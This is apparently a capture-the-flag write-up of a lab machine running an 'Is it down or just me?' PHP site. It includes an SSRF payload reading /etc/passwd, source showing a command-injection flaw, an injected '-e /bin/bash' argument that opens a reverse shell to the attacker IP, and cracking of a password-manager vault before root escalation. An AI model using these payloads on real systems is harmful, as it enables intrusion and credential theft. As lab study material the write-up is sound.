Extended version of [[Info]] from what was taken in the video
# Victim IP
```
10.129.39.124
```
# Attacker IP
```
10.10.14.191
```
# Nmap
[[Nmap]]
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f6:cc:21:7c:ca:da:ed:34:fd:04:ef:e6:f9:4c:dd:f8 (ECDSA)
|_ 256 fa:06:1f:f4:bf:8c:e3:b0:c8:40:21:0d:57:06:dd:11 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Is it down or just me?
|_http-server-header: Apache/2.4.52 (Ubuntu)
3190/tcp filtered csvr-proxy
3329/tcp filtered hp-device-disc
4285/tcp filtered vrml-multi-use
4680/tcp filtered mgemanagement
4967/tcp filtered unknown
6336/tcp filtered unknown
7753/tcp filtered unknown
8999/tcp filtered bctp
10362/tcp filtered unknown
11051/tcp filtered unknown
11600/tcp filtered tempest-port
11903/tcp filtered unknown
12708/tcp filtered unknown
13199/tcp filtered unknown
15078/tcp filtered unknown
16140/tcp filtered unknown
17153/tcp filtered unknown
17609/tcp filtered unknown
25119/tcp filtered unknown
34475/tcp filtered unknown
35375/tcp filtered unknown
39696/tcp filtered unknown
40259/tcp filtered unknown
41464/tcp filtered unknown
44320/tcp filtered unknown
46811/tcp filtered unknown
49334/tcp filtered unknown
51690/tcp filtered unknown
54014/tcp filtered unknown
54250/tcp filtered unknown
59865/tcp filtered unknown
61349/tcp filtered unknown
62024/tcp filtered unknown
63662/tcp filtered unknown
65417/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 16:30
Completed NSE at 16:30, 0.00s elapsed
Initiating NSE at 16:30
Completed NSE at 16:30, 0.00s elapsed
Initiating NSE at 16:30
Completed NSE at 16:30, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 590.06 seconds
Raw packets sent: 72586 (3.194MB) | Rcvd: 70925 (2.889MB)
```
does not have internet connection but can use http / https addresses
have SSRF attack running in burpsuite
tried other forms such as file:// but got an error
about to run gobuster for directery / file enum
# Gobuster
[[Gobuster]]
```
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.39.124
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript (Status: 301) [Size: 319] [--> http://10.129.39.124/javascript/]
/index.php (Status: 200) [Size: 739]
/server-status (Status: 403) [Size: 278]
Progress: 47937 / 60000 (79.89%)[ERROR] parse "http://10.129.39.124/error\x1f_log": net/url: invalid control character in URL
[ERROR] parse "http://10.129.39.124/error\x1f_log.php": net/url: invalid control character in URL
Progress: 59998 / 60000 (100.00%)
===============================================================
Finished
===============================================================
```
nothing of interest
by requesting
```
http://+file%3a///etc/passwd
```
as the url parameter in the post request we can get the output of /etc/passwd
where we discover the user `aleks` login shell is `/bin/bash`
Was able to disclose index.php by requesting `http:// file:///var/www/html/index.php` url encoded ofc and got this source code back after html decoding it
```php
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Is it down or just me?</title>
<link rel="stylesheet" href="style.css">
</head>
<body>
<header>
<img src="/logo.png" alt="Logo">
<h2>Is it down or just me?</h2>
</header>
<div class="container">
<?php
if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' ) {
echo '<h1>Is the port refused, or is it just you?</h1>
<form id="urlForm" action="index.php?expertmode=tcp" method="POST">
<input type="text" id="url" name="ip" placeholder="Please enter an IP." required><br>
<input type="number" id="port" name="port" placeholder="Please enter a port number." required><br>
<button type="submit">Is it refused?</button>
</form>';
} else {
echo '<h1>Is that website down, or is it just you?</h1>
<form id="urlForm" action="index.php" method="POST">
<input type="url" id="url" name="url" placeholder="Please enter a URL." required><br>
<button type="submit">Is it down?</button>
</form>';
}
if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' && isset($_POST['ip']) && isset($_POST['port']) ) {
$ip = trim($_POST['ip']);
$valid_ip = filter_var($ip, FILTER_VALIDATE_IP);
$port = trim($_POST['port']);
$port_int = intval($port);
$valid_port = filter_var($port_int, FILTER_VALIDATE_INT);
if ( $valid_ip && $valid_port ) {
$rc = 255; $output = '';
$ec = escapeshellcmd("/usr/bin/nc -vz $ip $port");
exec($ec . " 2>&1",$output,$rc);
echo '<div class="output" id="outputSection">';
if ( $rc === 0 ) {
echo "<font size=+1>It is up. It's just you! ð</font><br><br>";
echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>';
} else {
echo "<font size=+1>It is down for everyone! ð</font><br><br>";
echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>';
}
} else {
echo '<div class="output" id="outputSection">';
echo '<font color=red size=+1>Please specify a correct IP and a port between 1 and 65535.</font>';
}
} elseif (isset($_POST['url'])) {
$url = trim($_POST['url']);
if ( preg_match('|^https?://|',$url) ) {
$rc = 255; $output = '';
$ec = escapeshellcmd("/usr/bin/curl -s $url");
exec($ec . " 2>&1",$output,$rc);
echo '<div class="output" id="outputSection">';
if ( $rc === 0 ) {
echo "<font size=+1>It is up. It's just you! ð</font><br><br>";
echo '<p id="outputDetails"><pre>'.htmlspecialchars(implode("\n",$output)).'</pre></p>';
} else {
echo "<font size=+1>It is down for everyone! ð</font><br><br>";
}
} else {
echo '<div class="output" id="outputSection">';
echo '<font color=red size=+1>Only protocols http or https allowed.</font>';
}
}
?>
</div>
</div>
<footer>© 2024 isitdownorjustme LLC</footer>
</body>
</html>
```
```php
<?php
if ( isset($_GET['expertmode']) && $_GET['expertmode'] === 'tcp' ) {
echo '<h1>Is the port refused, or is it just you?</h1>
<form id="urlForm" action="index.php?expertmode=tcp" method="POST">
<input type="text" id="url" name="ip" placeholder="Please enter an IP." required><br>
<input type="number" id="port" name="port" placeholder="Please enter a port number." required><br>
<button type="submit">Is it refused?</button>
</form>';
} else {
echo '<h1>Is that website down, or is it just you?</h1>
<form id="urlForm" action="index.php" method="POST">
<input type="url" id="url" name="url" placeholder="Please enter a URL." required><br>
<button type="submit">Is it down?</button>
</form>';
}
```
stands out as it's looking for a get parameter of expertmode with the value of tcp to show a new form
bypassed filter on expertmode to get reverse shell using [[Burpsuite]]
```
ip=10.10.14.191&port=1337 -e /bin/bash
```
and using a [[netcat|nc]] we can get a reverseshell
We can upgrade the shell using [[upgrade shell|Upgrade Shell]]
Using the new shell we can run `whoami` or `id` to confirm we are running as the `www-data` user
where we see the user flag in the directory we get a shell in
we have read access to some of the user `aleks` home folder in `/home/aleks`
where we find the file `pswm` in `/home/aleks/.local/share/pswm`
where some googling review `pswm` is a python password manager and googling `pswm-bruteforce` gives us the github repository [pswm-decryptor](https://github.com/seriotonctf/pswm-decryptor)
where we had to use [[pip]] to install a dependency of `cryptocode` and then change the file it was looking to a file in caden64's case `pswm` or in daves case `pswm2` and ran the script to get the password of `flower` which also gave us 'aleks' password where we were able to switch users and check what sudo permissions we had to notice we had permissions to run any command as root we can run
```bash
sudo su
```
to switch to the root user and claim the root flag in `/root`